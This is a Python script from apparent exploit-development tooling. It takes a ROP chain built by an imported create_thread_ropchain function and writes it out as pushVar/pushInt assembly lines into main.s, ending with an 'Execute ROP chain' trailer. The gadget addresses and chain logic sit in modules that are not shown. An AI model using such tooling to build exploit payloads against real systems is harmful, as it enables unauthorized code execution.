from tcp_ropchain import *
from PayloadAddress import *
# Trailer that write_rop_chain() prints after the last chain entry.
CHAIN_END = (
    "#Execute ROP chain\n"
    "exit\n"
    "\n"
    "#Dunno why but I figured I might as well put it here, should never hit this though\n"
    "end"
)
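def write_rop_chain(rop_chain, path):
    """Render *rop_chain* as assembly text and write it to *path*.

    The output is the contents of ``rop_setup.s`` (opened relative to the
    current working directory), then one line per chain entry, then
    ``CHAIN_END``.

    Args:
        rop_chain: Iterable of chain entries. A ``PayloadAddress`` entry is
            written as the fixed line ``pushVar. globalVar,mscScriptAddress``;
            an ``int`` entry is written as ``pushInt.`` followed by
            ``hex(entry)``.
        path: Destination file; it is created or truncated.

    Raises:
        TypeError: If an entry is neither a ``PayloadAddress`` nor an ``int``.
            It is raised before *path* is opened, so a bad chain never leaves
            a truncated file behind.
        OSError: If ``rop_setup.s`` cannot be read or *path* cannot be written.
    """
    # Render and validate every entry up front; the original raised from
    # inside the open output file and left a half-written chain on disk.
    rendered = []
    for command in rop_chain:
        if isinstance(command, PayloadAddress):
            rendered.append("pushVar. globalVar,mscScriptAddress")
        elif isinstance(command, int):
            # NOTE(review): bool passes this check (it subclasses int), and
            # hex() of a negative int yields "-0x..." - whether the consumer
            # of this file accepts either is not visible here; confirm.
            rendered.append(f"pushInt. {hex(command)}")
        else:
            # TypeError is a subclass of Exception, so callers that catch the
            # previously raised bare Exception keep working.
            raise TypeError(f"Found invalid type {type(command)} in rop_chain")

    with open('rop_setup.s', 'r') as f:
        setup = f.read()

    with open(path, 'w') as f:
        print(setup, file=f)
        for line in rendered:
            print(line, file=f)
        print(CHAIN_END, file=f)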
def main():
    """Write the chain returned by create_thread_ropchain() to ``main.s``."""
    payload_address = PayloadAddress()
    write_rop_chain(create_thread_ropchain(payload_address), 'main.s')
# Run main() only when this file is executed as a script, not when imported.
if __name__ == "__main__":
    main()